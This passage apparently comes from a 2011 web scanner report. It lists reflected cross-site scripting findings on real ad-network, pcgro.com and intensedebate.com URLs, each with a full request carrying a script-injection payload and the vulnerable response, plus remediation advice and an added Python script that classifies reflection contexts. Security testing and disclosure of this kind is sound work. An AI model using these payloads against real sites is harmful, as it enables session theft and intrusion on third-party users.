Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIIO4016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:02 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/728_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/728/11864345014@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetworkfebad"><script>alert(1)</script>82ddd457fa8/728x90/autnwsrlsttch/ss/a/L7/1864345014/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?">
...[SNIP]...

1.63. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acbe7"><script>alert(1)</script>31ceefc8c18 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90acbe7"><script>alert(1)</script>31ceefc8c18/autnwsrlsttch/ss/a@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIKO10167S|O7016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 518
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:04 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/728_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/728/1877429826@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90acbe7"><script>alert(1)</script>31ceefc8c18/autnwsrlsttch/ss/a/L7/877429826/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?">
...[SNIP]...

1.64. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 915db"><script>alert(1)</script>9d0a28cc48b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch915db"><script>alert(1)</script>9d0a28cc48b/ss/a@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:07 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxINO2016Kj; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:07 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/728_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/728/11973812284@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch915db"><script>alert(1)</script>9d0a28cc48b/ss/a/L7/1973812284/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?">
...[SNIP]...

1.65. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8c41"><script>alert(1)</script>2ec6b63e70e was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ssd8c41"><script>alert(1)</script>2ec6b63e70e/a@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:09 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIPO10167S|O4016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 520
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:09 GMT;path=/

<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/728_B3AdTag --->
<script LANGUAGE="JavaScript1.1"
SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/728/11358408129@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ssd8c41"><script>alert(1)</script>2ec6b63e70e/a/L7/1358408129/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?">
...[SNIP]...

1.66. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c515b"><script>alert(1)</script>063cb3f5ca9 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1c515b"><script>alert(1)</script>063cb3f5ca9 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:11 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIR; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:11 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a/1256236826/Top1c515b"><script>alert(1)</script>063cb3f5ca9/default/empty.gif/726348573830307044726341416f7670?" target="_top">
...[SNIP]...

1.67. http://pcgro.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pcgro.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beba3'%3balert(1)//a5854d94aff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as beba3';alert(1)//a5854d94aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Note what the response below does and does not encode: the ampersand separating the query parameters comes back as &amp;, while the single quote in the payload is left intact and closes the string literal. HTML entity encoding of that kind protects attribute and text contexts only; character references are not decoded inside a script element, so a value written into a JavaScript string needs JavaScript string escaping (for example \xHH or \uHHHH for every non-alphanumeric character), or should be handed to the script through a data attribute or JSON block instead of being spliced into the source.

Request

GET /?beba3'%3balert(1)//a5854d94aff=1 HTTP/1.1
Host: pcgro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:53:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 1 Jan 2001 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: 9e9d38e7ad620998fb8da7bce594c371=4b20ac2b0f499164fa2e1b141b01c72e; path=/
Set-Cookie: lang=deleted; expires=Sun, 31-Jan-2010 20:53:12 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Sun, 31-Jan-2010 20:53:12 GMT; path=/
Set-Cookie: jfcookie[lang]=en; expires=Tue, 01-Feb-2011 20:53:13 GMT; path=/
Last-Modified: Mon, 31 Jan 2011 20:53:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 79756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
ge,.roknewspager-div a,#rokintroscroller,.feature-block .image-full']}); });window.addEvent('domready', function() { new GantryMoreArticles({'leadings': 1, 'moreText': 'Load More Articles', 'url': '/?beba3';alert(1)//a5854d94aff=1&amp;tmpl=component&amp;type=raw'}); })
        window.addEvent('load', function() {
                   new Fusion('ul.menutop', {
                       pill: 0,
                       effect: 'slide',
                       opacity: 1,
                       hideDelay: 500,
   
...[SNIP]...
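The "Issue detail" paragraphs in this report describe the same check each time: the scanner wraps a break-out string in two random alphanumeric markers, resubmits the request, then looks for the markers in the response and records whether the echo was unmodified and in which syntactic context it landed. The Python below is an added illustration of that classification; it is not the scanner's code and not code from any of the listed sites. The response fragments are constructed, shortened stand-ins for the double-quoted attribute echo (1.65, 1.66), the single-quoted attribute echo (1.68 onwards), the single-quoted JavaScript string echo (1.67) and the plain-text echo (1.76 onwards); the AAAA/BBBB markers and the host names in them are placeholders, and the quote tracking is a naive count that assumes no escaped quotes.

```python
"""Locate a reflected scanner payload in a response body and classify its context.

Added example for this report, not scanner code.  Sample bodies are constructed
stand-ins for the response shapes the report shows; markers are fixed here.
"""
import re
from urllib.parse import unquote

# Break-out cores used by the report's payloads; the surrounding markers are random.
PAYLOADS = {
    "attr-dq": '"><script>alert(1)</script>',
    "attr-sq": "'><script>alert(1)</script>",
    "js-sq": "'%3balert(1)//",          # submitted URL-encoded, echoed decoded
    "text": "<script>alert(1)</script>",
}

# Constructed fragments modelled on the realmedia.com, intensedebate.com,
# pcgro.com and shiflett.org echoes in this report (hosts are placeholders).
SAMPLES = {
    "attr-dq": '<script LANGUAGE="JavaScript1.1" SRC="http://ad.example/ss/AAAA"><script>alert(1)</script>BBBB/Top1?">',
    "attr-sq": "<script type='text/javascript' src='http://login.example/?back=http://site.example/css/base.cssAAAA'><script>alert(1)</script>BBBB'>",
    "js-sq": "<script>window.addEvent('domready', function() { new Foo({'url': '/?AAAA';alert(1)//BBBB=1&amp;tmpl=raw'}); });</script>",
    "text": "<pre>Exception Object ( [_requestUri:protected] => /articlesAAAA<script>alert(1)</script>BBBB/foo )</pre>",
    # Same payload as attr-dq, but entity-encoded by the application: not exploitable.
    "encoded": '<input value="AAAA&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;BBBB">',
}


def locate(body, prefix, suffix):
    """Return (echoed_core, offset_of_core) for the first prefix...suffix span, else None."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    return (m.group(1), m.start(1)) if m else None


def quote_state(fragment):
    """Naive quote tracker: an odd count of a quote character means we are inside it.
    Assumes the fragment contains no escaped quotes (true for the samples here)."""
    if fragment.count('"') % 2:
        return '"'
    if fragment.count("'") % 2:
        return "'"
    return None


def classify(body, offset):
    """Classify position `offset` as attribute / javascript / text, plus the
    quote character enclosing it (None when unquoted)."""
    before = body[:offset]
    if before.rfind("<") > before.rfind(">"):      # an open tag has not been closed yet
        return "attribute", quote_state(before[before.rfind("<"):])
    low = before.lower()
    s_open, s_close = low.rfind("<script"), low.rfind("</script")
    if s_open > s_close:                             # inside the body of a <script> element
        js = before[before.find(">", s_open) + 1:]
        return "javascript", quote_state(js)
    return "text", None


def breaks_out(context, quote, echoed):
    """True when the characters needed to leave the context survived unencoded."""
    if context == "attribute":
        return quote is not None and (quote + ">") in echoed
    if context == "javascript":
        # A raw matching quote terminates the string literal; what follows is code.
        return quote is not None and quote in echoed
    return "<script" in echoed.lower()


def assess(body, prefix, payload, suffix):
    """Scanner-style verdict for one response body."""
    hit = locate(body, prefix, suffix)
    if hit is None:
        return {"reflected": False}
    echoed, offset = hit
    context, quote = classify(body, offset)
    return {
        "reflected": True,
        "echoed_unmodified": echoed in (payload, unquote(payload)),
        "context": context,
        "quote": quote,
        "exploitable": breaks_out(context, quote, echoed),
    }


def run_samples():
    """Assess every constructed sample with its matching payload core."""
    results = {}
    for name, body in SAMPLES.items():
        payload = PAYLOADS["attr-dq" if name == "encoded" else name]
        results[name] = assess(body, "AAAA", payload, "BBBB")
    return results


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:8s} {verdict}")
```

The "encoded" sample is the negative control: the markers are present, so the value is reflected, but the break-out characters came back as entities and the verdict is not exploitable. That distinction between "reflected" and "echoed unmodified" is exactly what separates an informational finding from the High-severity entries in this report.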

1.68. http://s.intensedebate.com/css/base.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /css/base.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8ecad'><script>alert(1)</script>cf169dd7d02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/base.css8ecad'><script>alert(1)</script>cf169dd7d02 HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __qca=P0-1269071080-1296494784940; __utmb=239309019.1.10.1296494785;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 20:41:46 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4793

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/css/base.css8ecad'><script>alert(1)</script>cf169dd7d02'>
...[SNIP]...

1.69. http://s.intensedebate.com/css/ie6.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /css/ie6.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86fcd'><script>alert(1)</script>3b532c73185 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/ie6.css86fcd'><script>alert(1)</script>3b532c73185 HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __qca=P0-1269071080-1296494784940; __utmb=239309019.1.10.1296494785;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 20:41:45 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4792

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/css/ie6.css86fcd'><script>alert(1)</script>3b532c73185'>
...[SNIP]...

1.70. http://s.intensedebate.com/css/sys.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /css/sys.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cb57'><script>alert(1)</script>0de770915df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/sys.css4cb57'><script>alert(1)</script>0de770915df HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1; __utmc=239309019; __qca=P0-1269071080-1296494784940; __utmb=239309019.1.10.1296494785;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 20:41:41 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4793

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/css/sys.css4cb57'><script>alert(1)</script>0de770915df'>
...[SNIP]...

1.71. http://s.intensedebate.com/images/avatar-compact.png/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/avatar-compact.png/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 13f4b'><script>alert(1)</script>0aa548d0782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images13f4b'><script>alert(1)</script>0aa548d0782/avatar-compact.png/ HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 17:33:32 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4812

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images13f4b'><script>alert(1)</script>0aa548d0782/avatar-compact.png/'>
...[SNIP]...

1.72. http://s.intensedebate.com/images/avatar-compact.png/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/avatar-compact.png/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2dc7a'><script>alert(1)</script>2027a17b009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/avatar-compact.png2dc7a'><script>alert(1)</script>2027a17b009/ HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 17:33:33 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4811

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/avatar-compact.png2dc7a'><script>alert(1)</script>2027a17b009/'>
...[SNIP]...

1.73. http://s.intensedebate.com/images/avatar-compact.png/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/avatar-compact.png/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eef9c'><script>alert(1)</script>96c8bfb1934 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/avatar-compact.png/?eef9c'><script>alert(1)</script>96c8bfb1934=1 HTTP/1.1
Host: s.intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Mon, 31 Jan 2011 17:33:31 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Connection: close
Content-Length: 4815

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
